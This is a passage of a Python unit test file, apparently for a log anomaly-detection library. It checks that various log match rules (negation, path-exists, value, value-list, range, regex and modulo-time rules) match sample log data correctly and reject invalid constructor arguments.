fdme3.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertTrue(vddmr.match(log_atom)) match_context = DummyMatchContext(b".There are 26 letters in the english alphabet") match_element = fdme2.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertFalse(vddmr.match(log_atom)) match_context = DummyMatchContext(b"192.168.0.1") match_element = fdme4.get_match_element("match", match_context) match_element.match_object = 3232235521 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertFalse(vddmr.match(log_atom)) self.assertRaises(ValueError, ValueDependentDelegatedMatchRule, [], {(alphabet,): srmr}) self.assertRaises(ValueError, ValueDependentDelegatedMatchRule, [""], {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, [srmr], {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, [b"default"], {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, "default", {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, b"default", {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, True, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, 123, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, 123.22, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, {"id": "Default"}, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, (), {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, set(), {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, None, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {"default": srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {True: srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {123: srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {123.22: srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(): srmr}) ValueDependentDelegatedMatchRule(["default"], {("default",): srmr}) ValueDependentDelegatedMatchRule(["default"], {(b"default",): srmr}) ValueDependentDelegatedMatchRule(["default"], {(123,): srmr}) ValueDependentDelegatedMatchRule(["default"], {(123.2,): srmr}) ValueDependentDelegatedMatchRule(["default"], {(True,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=b"default") self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule="default") self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=True) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=123) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=123.3) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule={"id": "Default"}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=()) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=set()) ValueDependentDelegatedMatchRule(["default"], {("default",): srmr}, default_rule=srmr) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=b"default") self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action="default") self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=True) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=123) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=123.3) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action={"id": "Default"}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=()) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=[]) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=set()) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueDependentDelegatedMatchRule(["default"], {("default",): srmr}, match_action=egma) def test7NegationMatchRule(self): """This case unit the NegationMatchRule.""" match_s1 = "match/s1" fixed_string = b"fixed String" pemr = PathExistsMatchRule(match_s1, None) nmr = NegationMatchRule(pemr) fdme = DummyFixedDataModelElement("s1", fixed_string) match_context = DummyMatchContext(fixed_string) match_element = fdme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, pemr) self.assertTrue(pemr.match(log_atom)) self.assertFalse(nmr.match(log_atom)) self.assertRaises(TypeError, NegationMatchRule, b"default") self.assertRaises(TypeError, NegationMatchRule, "default") self.assertRaises(TypeError, NegationMatchRule, True) self.assertRaises(TypeError, NegationMatchRule, 123) self.assertRaises(TypeError, NegationMatchRule, 123.3) self.assertRaises(TypeError, NegationMatchRule, {"id": "Default"}) self.assertRaises(TypeError, NegationMatchRule, ()) self.assertRaises(TypeError, NegationMatchRule, []) self.assertRaises(TypeError, NegationMatchRule, set()) self.assertRaises(TypeError, NegationMatchRule, None) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=b"default") self.assertRaises(TypeError, NegationMatchRule, pemr, match_action="default") self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=True) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=123) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=123.3) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action={"id": "Default"}) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=()) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=set()) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) NegationMatchRule(pemr, egma) def test8PathExistsMatchRule(self): """Test the PathExistsMatchRule.""" t = time() match_s1 = "match/s1" data = b"fixed String" pemr = PathExistsMatchRule(match_s1, None) fdme1 = DummyFixedDataModelElement("s1", data) fdme2 = DummyFixedDataModelElement("s2", data) match_context = DummyMatchContext(data) match_element = fdme1.get_match_element("match", match_context) log_atom1 = LogAtom(match_element.match_string, ParserMatch(match_element), t, pemr) self.assertTrue(pemr.match(log_atom1)) match_context = DummyMatchContext(data) match_element = fdme2.get_match_element("match", match_context) log_atom2 = LogAtom(match_element.match_string, ParserMatch(match_element), t, pemr) self.assertFalse(pemr.match(log_atom2)) self.assertRaises(ValueError, PathExistsMatchRule, "") self.assertRaises(TypeError, PathExistsMatchRule, b"default") self.assertRaises(TypeError, PathExistsMatchRule, True) self.assertRaises(TypeError, PathExistsMatchRule, 123) self.assertRaises(TypeError, PathExistsMatchRule, 123.3) self.assertRaises(TypeError, PathExistsMatchRule, {"id": "Default"}) self.assertRaises(TypeError, PathExistsMatchRule, ()) self.assertRaises(TypeError, PathExistsMatchRule, []) self.assertRaises(TypeError, PathExistsMatchRule, set()) self.assertRaises(TypeError, PathExistsMatchRule, None) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=b"default") self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action="default") self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=True) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=123) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=123.3) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action={"id": "Default"}) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=()) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=set()) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) PathExistsMatchRule("default", egma) def test9ValueMatchRule(self): """Test the ValueMatchRule.""" data1 = b"fixed String" data2 = b"another fixed String" vmr = ValueMatchRule("match/s1", data1, None) fdme1 = DummyFixedDataModelElement("s1", data1) fdme2 = DummyFixedDataModelElement("s1", data2) match_context = DummyMatchContext(data1) match_element = fdme1.get_match_element("match", match_context) log_atom1 = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vmr) self.assertTrue(vmr.match(log_atom1)) match_context = DummyMatchContext(data2) match_element = fdme2.get_match_element("match", match_context) log_atom2 = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vmr) self.assertFalse(vmr.match(log_atom2)) self.assertRaises(ValueError, ValueMatchRule, "", b"value") self.assertRaises(TypeError, ValueMatchRule, b"default", b"value") self.assertRaises(TypeError, ValueMatchRule, True, b"value") self.assertRaises(TypeError, ValueMatchRule, 123, b"value") self.assertRaises(TypeError, ValueMatchRule, 123.3, b"value") self.assertRaises(TypeError, ValueMatchRule, {"id": "Default"}, b"value") self.assertRaises(TypeError, ValueMatchRule, (), b"value") self.assertRaises(TypeError, ValueMatchRule, [], b"value") self.assertRaises(TypeError, ValueMatchRule, set(), b"value") self.assertRaises(TypeError, ValueMatchRule, None, b"value") self.assertRaises(ValueError, ValueMatchRule, "default", b"") self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=b"default") self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action="default") self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=True) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=123) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=123.3) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action={"id": "Default"}) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=()) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=set()) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueMatchRule("default", b"value", egma) def test10ValueListMatchRule(self): """Test the ValueListMatchRule.""" vlmr = ValueListMatchRule("match/d1", [1, 2, 4, 8, 16, 32, 64, 128, 256, 512], None) nme = DummyNumberModelElement("d1") match_context = DummyMatchContext(b"64") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vlmr) self.assertTrue(vlmr.match(log_atom)) match_context = DummyMatchContext(b"4711") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vlmr) self.assertFalse(vlmr.match(log_atom)) self.assertRaises(ValueError, ValueListMatchRule, "", [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, b"default", [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, True, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, 123, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, 123.3, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, {"id": "Default"}, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, (), [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, [], [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, set(), [b"value"]) self.assertRaises(ValueError, ValueListMatchRule, "default", []) self.assertRaises(ValueError, ValueListMatchRule, "default", [""]) self.assertRaises(TypeError, ValueListMatchRule, "default", b"default") self.assertRaises(TypeError, ValueListMatchRule, "default", "default") self.assertRaises(TypeError, ValueListMatchRule, "default", True) self.assertRaises(TypeError, ValueListMatchRule, "default", 123) self.assertRaises(TypeError, ValueListMatchRule, "default", 123.3) self.assertRaises(TypeError, ValueListMatchRule, "default", {"id": "Default"}) self.assertRaises(TypeError, ValueListMatchRule, "default", ()) self.assertRaises(TypeError, ValueListMatchRule, "default", set()) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=b"default") self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action="default") self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=True) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=123) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=123.3) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action={"id": "Default"}) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=()) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=set()) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueListMatchRule("default", [b"value"], egma) def test11ValueRangeMatchRule(self): """Test the ValueRangeMatchRule.""" vrmr = ValueRangeMatchRule("match/d1", 1, 1000, None) nme = DummyNumberModelElement("d1") match_context = DummyMatchContext(b"1") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertTrue(vrmr.match(log_atom)) match_context = DummyMatchContext(b"1000") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertTrue(vrmr.match(log_atom)) match_context = DummyMatchContext(b"0") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertFalse(vrmr.match(log_atom)) match_context = DummyMatchContext(b"1001") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertFalse(vrmr.match(log_atom)) self.assertRaises(ValueError, ValueRangeMatchRule, "", 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, b"default", 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, True, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, 123, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, 123.3, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, {"id": "Default"}, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, (), 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, [], 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, set(), 1, 100) self.assertRaises(ValueError, ValueRangeMatchRule, "default", 100, 1) self.assertRaises(TypeError, ValueRangeMatchRule, "default", [""], 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", b"default", 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", "default", 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", True, 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", {"id": "Default"}, 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", (), 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", set(), 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, [""]) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, b"default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, "default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, True) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, {"id": "Default"}) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, ()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, set()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=b"default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action="default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=True) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=123) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=123.3) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action={"id": "Default"}) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=set()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=[]) def test12StringRegexMatchRule(self): """Test the StringRegexMatchRule.""" match_any = "match/any" alphabet = b"There are 26 letters in the english alphabet" regex = re.compile(rb"\w") srmr = StringRegexMatchRule(match_any, regex, None) fdme1 = DummyFixedDataModelElement("any", alphabet) fdme2 = DummyFixedDataModelElement("any", b"--> There are 26 letters in the english alphabet") match_context = DummyMatchContext(alphabet) match_element = fdme1.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, srmr) self.assertTrue(srmr.match(log_atom)) match_context = DummyMatchContext(b"--> There are 26 letters in the english alphabet") match_element = fdme2.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, srmr) self.assertFalse(srmr.match(log_atom)) self.assertRaises(ValueError, StringRegexMatchRule, "", regex) self.assertRaises(TypeError, StringRegexMatchRule, b"default", regex) self.assertRaises(TypeError, StringRegexMatchRule, True, regex) self.assertRaises(TypeError, StringRegexMatchRule, 123, regex) self.assertRaises(TypeError, StringRegexMatchRule, 123.3, regex) self.assertRaises(TypeError, StringRegexMatchRule, {"id": "Default"}, regex) self.assertRaises(TypeError, StringRegexMatchRule, (), regex) self.assertRaises(TypeError, StringRegexMatchRule, [], regex) self.assertRaises(TypeError, StringRegexMatchRule, set(), regex) self.assertRaises(TypeError, StringRegexMatchRule, None, regex) self.assertRaises(TypeError, StringRegexMatchRule, "default", None) self.assertRaises(TypeError, StringRegexMatchRule, "default", "default") self.assertRaises(TypeError, StringRegexMatchRule, "default", b"default") self.assertRaises(TypeError, StringRegexMatchRule, "default", True) self.assertRaises(TypeError, StringRegexMatchRule, "default", 123) self.assertRaises(TypeError, StringRegexMatchRule, "default", 123.3) self.assertRaises(TypeError, StringRegexMatchRule, "default", {"id": "Default"}) self.assertRaises(TypeError, StringRegexMatchRule, "default", ()) self.assertRaises(TypeError, StringRegexMatchRule, "default", []) self.assertRaises(TypeError, StringRegexMatchRule, "default", set()) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=b"default") self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action="default") self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=True) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=123) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=123.3) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action={"id": "Default"}) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=()) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=set()) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueMatchRule("default", regex, egma) def test13ModuloTimeMatchRule(self): """Test the ModuloTimeMatchRule.""" model_syslog_time = "/model/syslog/time" mtmr = ModuloTimeMatchRule(model_syslog_time, 86400, 43200, 86400, None) t = time() match_element = MatchElement(model_syslog_time, b"14.02.2019 13:00:00", 1550149200, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) self.assertTrue(mtmr.match(log_atom)) match_element = MatchElement(model_syslog_time, b"15.02.2019 00:00:00", 1550188800, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) self.assertFalse(mtmr.match(log_atom)) match_element = MatchElement(model_syslog_time, b"14.02.2019 12:00:00", 1550145600, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) self.assertTrue(mtmr.match(log_atom)) match_element = MatchElement(model_syslog_time, b"15.02.2019 01:00:00", 1550192400, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) self.assertFalse(mtmr.match(log_atom)) self.assertRaises(ValueError, ModuloTimeMatchRule, "", 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, b"default", 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, True, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, 123, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, 123.3, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, {"id": "Default"}, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, (), 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, [], 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, set(), 86400, 43200, 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 0, 43200, 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", -1, 43200, 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 86400, 86400, 43200) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 86400, 43200, 86401) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 1.1, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", [""], 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", b"default", 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", "default", 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", True, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", {"id": "Default"}, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", (), 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", set(), 43200, 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 86400, -1, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 1.1, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, [""], 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, b"default", 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, "default", 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, True, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, {"id": "Default"}, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, (), 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, set(), 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 86400, 43200, -1) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86399.1) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, [""]) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, b"default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, "default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, True) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, {"id": "Default"}) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, ()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, set()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=b"default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action="default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=True) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=123) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=123.3) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action={"id": "Default"}) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=set()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=[]) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=b"default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo="default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=True) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=123) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=123.3) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo={"id": "Default"}) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=set()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ModuloTimeMatchRule(model_syslog_time, 86400, 0, 75000, egma, datetime.now(timezone.utc).astimezone().tzinfo) def test14ValueDependentModuloTimeMatchRule(self): """Test the ValueDependentModuloTimeMatchRule.""" model_syslog_time = "/model/syslog/time" vdmtmr1 = ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [model_syslog_time], {1550145600: [43200, 86400]}) vdmtmr2 = ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [model_syslog_time], {1550145600: [40000, 86400]}, default_limit=[43200, 86400]) t = time() match_element = MatchElement(model_syslog_time, b"14.02.2019 13:00:00", 1550149200, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1) self.assertFalse(vdmtmr1.match(log_atom)) self.assertTrue(vdmtmr2.match(log_atom)) match_element = MatchElement(model_syslog_time, b"15.02.2019 00:00:00", 1550188800, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1) self.assertFalse(vdmtmr1.match(log_atom)) self.assertFalse(vdmtmr2.match(log_atom)) match_element = MatchElement(model_syslog_time, b"14.02.2019 12:00:00", 1550145600, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1) self.assertTrue(vdmtmr1.match(log_atom)) self.assertTrue(vdmtmr2.match(log_atom)) match_element = MatchElement(model_syslog_time, b"15.02.2019 01:00:00", 1550192400, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1) self.assertFalse(vdmtmr1.match(log_atom)) self.assertFalse(vdmtmr2.match(log_atom)) self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "", 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, b"default", 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, True, 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, 123, 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, 123.3, 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, {"id": "Default"}, 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, (), 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, [], 86400, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, set(), 86400, default_limit=[43200, 86400]) self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 0, default_limit=[43200, 86400]) self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", -1, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 1.1, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", [""], default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", b"default", default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", "default", default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", True, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", {"id": "Default"}, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", (), default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", set(), default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[""], default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[b"default"], default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[True], default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[123], default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list={"id": "Default"}, default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=(), default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=set(), default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list="default", default_limit=[43200, 86400]) self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [86400, 43200]}) 